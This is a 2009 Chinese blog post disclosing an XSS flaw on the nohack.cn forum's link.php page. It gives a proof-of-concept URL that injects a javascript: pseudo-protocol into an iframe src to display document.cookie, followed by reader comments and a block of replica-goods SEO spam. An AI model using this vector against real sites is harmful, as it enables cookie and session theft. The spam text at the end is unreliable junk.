Jul 31

Nohack XSS 不指定

woyigui , 14:41 , 网络安全 , 评论(3) , 引用(0) , 阅读(1662) , Via 本站原创 | |
link.php页面不是Dz论坛自带的,是nohack自己写的,虽然用 htmlspecialchars 函数进行处理了, php.ini配置里gpc也开了,虽然没办法通过闭合进行xss,但是nohack却忘记了javascript伪协议放在资源请求里面会被执行:
http://www.nohack.cn/bbs/link.php?link=javascript:alert(document.cookie)

页面内容:
<iframe id="url_mainframe" frameborder="0" scrolling="yes" name="main" src="javascript:alert(document.cookie)" style="height: 100%; visibility: inherit; width: 100%; z-index: 1;overflow: visible;"></iframe>

这种方式还是很多呀!!
Tags: , ,
无心 Homepage
2009/08/12 16:08
呵呵,空气修复漏洞的速度还是蛮快的么~~~~
sH
2009/07/31 16:42
顶!
randsafe
2009/07/31 15:37
鬼友最近学习什么呢?
woyigui 回复于 2009/07/31 16:06
who are you ?
分页: 1/1 第一页 1 最后页
发表评论
表情
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
打开HTML
打开UBB
打开表情
隐藏
记住我
昵称   密码   游客无需密码
网址   电邮   [注册]
               

 
20100511 NFL jerseysNFL jerseysNFL jerseys, louis vuitton bagslouis vuitton bagslouis vuitton bags, nike shoesnike shoesnike shoes, coach bagscoach bagscoach bags, jordan shoesjordan shoesjordan shoes, coach bagscoach bagscoach bags, tiffany jewelrytiffany jewelrytiffany jewelry, Shox r4Shox r4Shox r4, Shox nzShox nzShox nz, Shox nzNike dunk sbNike dunk sb, ghd straightenersghd straightenersghd straighteners, coach outletcoach outletcoach outlet, replica rolexreplica rolexreplica rolex, breitling watchesbreitling watchesbreitling watches, replica rolex watchesreplica rolex watchesreplica rolex watches, tag heuer carreratag heuer carreratag heuer carrera, replica louis vuitton replica louis vuitton replica louis vuitton , replica chanelreplica chanelreplica chanel, wholesale handbagswholesale handbagswholesale handbags, wholesale bagswholesale bagswholesale bags, jimmy choojimmy choojimmy choo, christian louboutinchristian louboutinchristian louboutin, yves saint laurent shoesyves saint laurent shoesyves saint laurent shoes, christian louboutinchristian louboutinchristian louboutin, ghdghdghd, ghd hairghd hairghd hair, 外贸网店建设外贸网店建设外贸网店建设, seoseoseo, 圣荷圣荷圣荷,